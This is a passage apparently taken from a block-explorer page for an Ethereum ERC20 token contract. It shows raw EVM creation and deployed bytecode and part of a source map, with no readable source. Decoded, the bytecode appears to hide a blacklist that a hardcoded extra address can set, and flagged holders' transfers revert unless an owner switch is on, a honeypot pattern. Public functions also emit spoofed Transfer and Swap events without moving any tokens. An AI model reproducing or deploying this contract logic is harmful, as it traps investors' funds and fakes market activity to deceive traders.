9050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060078054610bd790611b92565b80601f0160208091040260200160405190810160405280929190818152602001828054610c0390611b92565b8015610c505780601f10610c2557610100808354040283529160200191610c50565b820191906000526020600020905b815481529060010190602001808311610c3357829003601f168201915b5050505050905090565b60005b84849050811015610dde57848482818110610c7b57610c7a611c2f565b5b9050602002016020810190610c9091906119ff565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d8228560008087604051610d159493929190611d93565b60405180910390a3848482818110610d3057610d2f611c2f565b5b9050602002016020810190610d4591906119ff565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610dc391906118a8565b60405180910390a38080610dd690611c8d565b915050610c5d565b5050505050565b600080610df0611018565b90506000610dfe8286610ee9565b905083811015610e43576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e3a90611e4a565b60405180910390fd5b610e508286868403611020565b60019250505092915050565b600080610e67611018565b9050610e74818585611275565b600191505092915050565b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610edc91906118a8565b60405180910390a3505050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610f7861158c565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610fe7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fde90611edc565b60405180910390fd5b610ff08161160a565b50565b610ffb61158c565b80600560006101000a81548160ff02191690831515021790555050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361108f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161108690611f6e565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036110fe576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110f590612000565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516111dc91906118a8565b60405180910390a3505050565b60006111f58484610ee9565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff811461126f5781811015611261576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112589061206c565b60405180910390fd5b61126e8484848403611020565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036112e4576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112db906120fe565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611353576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161134a90612190565b60405180910390fd5b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050818110156113da576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113d190612222565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282540192505081905550600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16156115165760011515600560009054906101000a900460ff16151514611515576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161150c90612268565b60405180910390fd5b5b8273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161157391906118a8565b60405180910390a36115868484846116ce565b50505050565b611594611018565b73ffffffffffffffffffffffffffffffffffffffff166115b2610b9f565b73ffffffffffffffffffffffffffffffffffffffff1614611608576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016115ff90611c0f565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561170d5780820151818401526020810190506116f2565b60008484015250505050565b6000601f19601f8301169050919050565b6000611735826116d3565b61173f81856116de565b935061174f8185602086016116ef565b61175881611719565b840191505092915050565b6000602082019050818103600083015261177d818461172a565b905092915050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006117ba8261178f565b9050919050565b6117ca816117af565b81146117d557600080fd5b50565b6000813590506117e7816117c1565b92915050565b6000819050919050565b611800816117ed565b811461180b57600080fd5b50565b60008135905061181d816117f7565b92915050565b6000806040838503121561183a57611839611785565b5b6000611848858286016117d8565b92505060206118598582860161180e565b9150509250929050565b60008115159050919050565b61187881611863565b82525050565b6000602082019050611893600083018461186f565b92915050565b6118a2816117ed565b82525050565b60006020820190506118bd6000830184611899565b92915050565b6000806000606084860312156118dc576118db611785565b5b60006118ea868287016117d8565b93505060206118fb868287016117d8565b925050604061190c8682870161180e565b9150509250925092565b600060ff82169050919050565b61192c81611916565b82525050565b60006020820190506119476000830184611923565b92915050565b600080fd5b600080fd5b600080fd5b60008083601f8401126119725761197161194d565b5b8235905067ffffffffffffffff81111561198f5761198e611952565b5b6020830191508360208202830111156119ab576119aa611957565b5b9250929050565b600080602083850312156119c9576119c8611785565b5b600083013567ffffffffffffffff8111156119e7576119e661178a565b5b6119f38582860161195c565b92509250509250929050565b600060208284031215611a1557611a14611785565b5b6000611a23848285016117d8565b91505092915050565b60008060008060608587031215611a4657611a45611785565b5b600085013567ffffffffffffffff811115611a6457611a6361178a565b5b611a708782880161195c565b94509450506020611a838782880161180e565b9250506040611a948782880161180e565b91505092959194509250565b611aa9816117af565b82525050565b6000602082019050611ac46000830184611aa0565b92915050565b60008060408385031215611ae157611ae0611785565b5b6000611aef858286016117d8565b9250506020611b00858286016117d8565b9150509250929050565b611b1381611863565b8114611b1e57600080fd5b50565b600081359050611b3081611b0a565b92915050565b600060208284031215611b4c57611b4b611785565b5b6000611b5a84828501611b21565b91505092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680611baa57607f821691505b602082108103611bbd57611bbc611b63565b5b50919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611bf96020836116de565b9150611c0482611bc3565b602082019050919050565b60006020820190508181036000830152611c2881611bec565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000611c98826117ed565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8203611cca57611cc9611c5e565b5b600182019050919050565b6000611ce0826117ed565b9150611ceb836117ed565b9250828201905080821115611d0357611d02611c5e565b5b92915050565b6000819050919050565b6000819050919050565b6000611d38611d33611d2e84611d09565b611d13565b6117ed565b9050919050565b611d4881611d1d565b82525050565b6000608082019050611d636000830187611d3f565b611d706020830186611899565b611d7d6040830185611899565b611d8a6060830184611d3f565b95945050505050565b6000608082019050611da86000830187611899565b611db56020830186611d3f565b611dc26040830185611d3f565b611dcf6060830184611899565b95945050505050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b6000611e346025836116de565b9150611e3f82611dd8565b604082019050919050565b60006020820190508181036000830152611e6381611e27565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000611ec66026836116de565b9150611ed182611e6a565b604082019050919050565b60006020820190508181036000830152611ef581611eb9565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611f586024836116de565b9150611f6382611efc565b604082019050919050565b60006020820190508181036000830152611f8781611f4b565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611fea6022836116de565b9150611ff582611f8e565b604082019050919050565b6000602082019050818103600083015261201981611fdd565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b6000612056601d836116de565b915061206182612020565b602082019050919050565b6000602082019050818103600083015261208581612049565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006120e86025836116de565b91506120f38261208c565b604082019050919050565b60006020820190508181036000830152612117816120db565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b600061217a6023836116de565b91506121858261211e565b604082019050919050565b600060208201905081810360008301526121a98161216d565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b600061220c6026836116de565b9150612217826121b0565b604082019050919050565b6000602082019050818103600083015261223b816121ff565b9050919050565b50565b60006122526000836116de565b915061225d82612242565b600082019050919050565b6000602082019050818103600083015261228181612245565b905091905056fea26469706673582212204ba2f903d4c54d9eeb0f63d894af541f55c1d3fd772ba953125bac042bcf839464736f6c63430008120033

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106101425760003560e01c80637aac697b116100b8578063a457c2d71161007c578063a457c2d714610363578063a9059cbb14610393578063beabacc8146103c3578063dd62ed3e146103df578063f2fde38b1461040f578063fde980ca1461042b57610142565b80637aac697b146102bf57806381bac14f146102db5780638da5cb5b1461030b57806395d89b4114610329578063a1c617f51461034757610142565b80633811ac021161010a5780633811ac0214610201578063395093511461021d578063477e19441461024d57806366d382031461026957806370a0823114610285578063715018a6146102b557610142565b806306fdde0314610147578063095ea7b31461016557806318160ddd1461019557806323b872dd146101b3578063313ce567146101e3575b600080fd5b61014f610447565b60405161015c9190611763565b60405180910390f35b61017f600480360381019061017a9190611823565b6104d9565b60405161018c919061187e565b60405180910390f35b61019d6104fc565b6040516101aa91906118a8565b60405180910390f35b6101cd60048036038101906101c891906118c3565b610506565b6040516101da919061187e565b60405180910390f35b6101eb610535565b6040516101f89190611932565b60405180910390f35b61021b600480360381019061021691906119b2565b61053e565b005b61023760048036038101906102329190611823565b61076b565b604051610244919061187e565b60405180910390f35b610267600480360381019061026291906119b2565b6107a2565b005b610283600480360381019061027e91906119ff565b610914565b005b61029f600480360381019061029a91906119ff565b610960565b6040516102ac91906118a8565b60405180910390f35b6102bd6109a9565b005b6102d960048036038101906102d49190611a2c565b6109bd565b005b6102f560048036038101906102f091906119ff565b610b49565b604051610302919061187e565b60405180910390f35b610313610b9f565b6040516103209190611aaf565b60405180910390f35b610331610bc8565b60405161033e9190611763565b60405180910390f35b610361600480360381019061035c9190611a2c565b610c5a565b005b61037d60048036038101906103789190611823565b610de5565b60405161038a919061187e565b60405180910390f35b6103ad60048036038101906103a89190611823565b610e5c565b6040516103ba919061187e565b60405180910390f35b6103dd60048036038101906103d891906118c3565b610e7f565b005b6103f960048036038101906103f49190611aca565b610ee9565b60405161040691906118a8565b60405180910390f35b610429600480360381019061042491906119ff565b610f70565b005b61044560048036038101906104409190611b36565b610ff3565b005b60606006805461045690611b92565b80601f016020809104026020016040519081016040528092919081815260200182805461048290611b92565b80156104cf5780601f106104a4576101008083540402835291602001916104cf565b820191906000526020600020905b8154815290600101906020018083116104b257829003601f168201915b5050505050905090565b6000806104e4611018565b90506104f1818585611020565b600191505092915050565b6000600454905090565b600080610511611018565b905061051e8582856111e9565b610529858585611275565b60019150509392505050565b60006008905090565b610546611018565b73ffffffffffffffffffffffffffffffffffffffff16610564610b9f565b73ffffffffffffffffffffffffffffffffffffffff1614806105cc5750610589611018565b73ffffffffffffffffffffffffffffffffffffffff16732e647453bbd3f22d0f9cff289ba7937ba27cb95673ffffffffffffffffffffffffffffffffffffffff16145b61060b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161060290611c0f565b60405180910390fd5b60005b828290508110156107665760016002600085858581811061063257610631611c2f565b5b905060200201602081019061064791906119ff565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055503073ffffffffffffffffffffffffffffffffffffffff168383838181106106c2576106c1611c2f565b5b90506020020160208101906106d791906119ff565b73ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92561073e86868681811061072457610723611c2f565b5b905060200201602081019061073991906119ff565b610960565b60405161074b91906118a8565b60405180910390a3808061075e90611c8d565b91505061060e565b505050565b600080610776611018565b90506107978185856107888589610ee9565b6107929190611cd5565b611020565b600191505092915050565b6107aa611018565b73ffffffffffffffffffffffffffffffffffffffff166107c8610b9f565b73ffffffffffffffffffffffffffffffffffffffff16148061083057506107ed611018565b73ffffffffffffffffffffffffffffffffffffffff16732e647453bbd3f22d0f9cff289ba7937ba27cb95673ffffffffffffffffffffffffffffffffffffffff16145b61086f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161086690611c0f565b60405180910390fd5b60005b8282905081101561090f5760006002600085858581811061089657610895611c2f565b5b90506020020160208101906108ab91906119ff565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550808061090790611c8d565b915050610872565b505050565b61091c61158c565b80600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6109b161158c565b6109bb600061160a565b565b60005b84849050811015610b42578484828181106109de576109dd611c2f565b5b90506020020160208101906109f391906119ff565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d822600086866000604051610a799493929190611d4e565b60405180910390a3600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16858583818110610acd57610acc611c2f565b5b9050602002016020810190610ae291906119ff565b73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051610b2791906118a8565b60405180910390a38080610b3a90611c8d565b9150506109c0565b5050505050565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060078054610bd790611b92565b80601f0160208091040260200160405190810160405280929190818152602001828054610c0390611b92565b8015610c505780601f10610c2557610100808354040283529160200191610c50565b820191906000526020600020905b815481529060010190602001808311610c3357829003601f168201915b5050505050905090565b60005b84849050811015610dde57848482818110610c7b57610c7a611c2f565b5b9050602002016020810190610c9091906119ff565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d8228560008087604051610d159493929190611d93565b60405180910390a3848482818110610d3057610d2f611c2f565b5b9050602002016020810190610d4591906119ff565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610dc391906118a8565b60405180910390a38080610dd690611c8d565b915050610c5d565b5050505050565b600080610df0611018565b90506000610dfe8286610ee9565b905083811015610e43576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e3a90611e4a565b60405180910390fd5b610e508286868403611020565b60019250505092915050565b600080610e67611018565b9050610e74818585611275565b600191505092915050565b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610edc91906118a8565b60405180910390a3505050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610f7861158c565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610fe7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fde90611edc565b60405180910390fd5b610ff08161160a565b50565b610ffb61158c565b80600560006101000a81548160ff02191690831515021790555050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361108f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161108690611f6e565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036110fe576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110f590612000565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516111dc91906118a8565b60405180910390a3505050565b60006111f58484610ee9565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff811461126f5781811015611261576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112589061206c565b60405180910390fd5b61126e8484848403611020565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036112e4576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112db906120fe565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611353576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161134a90612190565b60405180910390fd5b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050818110156113da576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113d190612222565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282540192505081905550600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16156115165760011515600560009054906101000a900460ff16151514611515576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161150c90612268565b60405180910390fd5b5b8273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161157391906118a8565b60405180910390a36115868484846116ce565b50505050565b611594611018565b73ffffffffffffffffffffffffffffffffffffffff166115b2610b9f565b73ffffffffffffffffffffffffffffffffffffffff1614611608576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016115ff90611c0f565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561170d5780820151818401526020810190506116f2565b60008484015250505050565b6000601f19601f8301169050919050565b6000611735826116d3565b61173f81856116de565b935061174f8185602086016116ef565b61175881611719565b840191505092915050565b6000602082019050818103600083015261177d818461172a565b905092915050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006117ba8261178f565b9050919050565b6117ca816117af565b81146117d557600080fd5b50565b6000813590506117e7816117c1565b92915050565b6000819050919050565b611800816117ed565b811461180b57600080fd5b50565b60008135905061181d816117f7565b92915050565b6000806040838503121561183a57611839611785565b5b6000611848858286016117d8565b92505060206118598582860161180e565b9150509250929050565b60008115159050919050565b61187881611863565b82525050565b6000602082019050611893600083018461186f565b92915050565b6118a2816117ed565b82525050565b60006020820190506118bd6000830184611899565b92915050565b6000806000606084860312156118dc576118db611785565b5b60006118ea868287016117d8565b93505060206118fb868287016117d8565b925050604061190c8682870161180e565b9150509250925092565b600060ff82169050919050565b61192c81611916565b82525050565b60006020820190506119476000830184611923565b92915050565b600080fd5b600080fd5b600080fd5b60008083601f8401126119725761197161194d565b5b8235905067ffffffffffffffff81111561198f5761198e611952565b5b6020830191508360208202830111156119ab576119aa611957565b5b9250929050565b600080602083850312156119c9576119c8611785565b5b600083013567ffffffffffffffff8111156119e7576119e661178a565b5b6119f38582860161195c565b92509250509250929050565b600060208284031215611a1557611a14611785565b5b6000611a23848285016117d8565b91505092915050565b60008060008060608587031215611a4657611a45611785565b5b600085013567ffffffffffffffff811115611a6457611a6361178a565b5b611a708782880161195c565b94509450506020611a838782880161180e565b9250506040611a948782880161180e565b91505092959194509250565b611aa9816117af565b82525050565b6000602082019050611ac46000830184611aa0565b92915050565b60008060408385031215611ae157611ae0611785565b5b6000611aef858286016117d8565b9250506020611b00858286016117d8565b9150509250929050565b611b1381611863565b8114611b1e57600080fd5b50565b600081359050611b3081611b0a565b92915050565b600060208284031215611b4c57611b4b611785565b5b6000611b5a84828501611b21565b91505092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680611baa57607f821691505b602082108103611bbd57611bbc611b63565b5b50919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611bf96020836116de565b9150611c0482611bc3565b602082019050919050565b60006020820190508181036000830152611c2881611bec565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000611c98826117ed565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8203611cca57611cc9611c5e565b5b600182019050919050565b6000611ce0826117ed565b9150611ceb836117ed565b9250828201905080821115611d0357611d02611c5e565b5b92915050565b6000819050919050565b6000819050919050565b6000611d38611d33611d2e84611d09565b611d13565b6117ed565b9050919050565b611d4881611d1d565b82525050565b6000608082019050611d636000830187611d3f565b611d706020830186611899565b611d7d6040830185611899565b611d8a6060830184611d3f565b95945050505050565b6000608082019050611da86000830187611899565b611db56020830186611d3f565b611dc26040830185611d3f565b611dcf6060830184611899565b95945050505050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b6000611e346025836116de565b9150611e3f82611dd8565b604082019050919050565b60006020820190508181036000830152611e6381611e27565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000611ec66026836116de565b9150611ed182611e6a565b604082019050919050565b60006020820190508181036000830152611ef581611eb9565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611f586024836116de565b9150611f6382611efc565b604082019050919050565b60006020820190508181036000830152611f8781611f4b565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611fea6022836116de565b9150611ff582611f8e565b604082019050919050565b6000602082019050818103600083015261201981611fdd565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b6000612056601d836116de565b915061206182612020565b602082019050919050565b6000602082019050818103600083015261208581612049565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006120e86025836116de565b91506120f38261208c565b604082019050919050565b60006020820190508181036000830152612117816120db565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b600061217a6023836116de565b91506121858261211e565b604082019050919050565b600060208201905081810360008301526121a98161216d565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b600061220c6026836116de565b9150612217826121b0565b604082019050919050565b6000602082019050818103600083015261223b816121ff565b9050919050565b50565b60006122526000836116de565b915061225d82612242565b600082019050919050565b6000602082019050818103600083015261228181612245565b905091905056fea26469706673582212204ba2f903d4c54d9eeb0f63d894af541f55c1d3fd772ba953125bac042bcf839464736f6c63430008120033

Deployed Bytecode Sourcemap

20209:144:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;9085:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13133:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11902:108;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13914:295;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10047:92;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10147:414;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;14618:238;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11295:339;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;8930:85;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;12073:127;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5991:103;;;:::i;:::-;;10868:292;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;11642:106;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5350:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9304:104;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10569:291;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;15359:436;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12406:193;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11168:119;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;12662:151;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6249:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;11754:85;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;9085:100;9139:13;9172:5;9165:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;9085:100;:::o;13133:201::-;13216:4;13233:13;13249:12;:10;:12::i;:::-;13233:28;;13272:32;13281:5;13288:7;13297:6;13272:8;:32::i;:::-;13322:4;13315:11;;;13133:201;;;;:::o;11902:108::-;11963:7;11990:12;;11983:19;;11902:108;:::o;13914:295::-;14045:4;14062:15;14080:12;:10;:12::i;:::-;14062:30;;14103:38;14119:4;14125:7;14134:6;14103:15;:38::i;:::-;14152:27;14162:4;14168:2;14172:6;14152:9;:27::i;:::-;14197:4;14190:11;;;13914:295;;;;;:::o;10047:92::-;10105:5;10130:1;10123:8;;10047:92;:::o;10147:414::-;10237:12;:10;:12::i;:::-;10226:23;;:7;:5;:7::i;:::-;:23;;;:86;;;;10300:12;:10;:12::i;:::-;10254:58;;:42;:58;;;10226:86;10218:131;;;;;;;;;;;;:::i;:::-;;;;;;;;;10365:9;10360:194;10384:11;;:18;;10380:1;:22;10360:194;;;10452:4;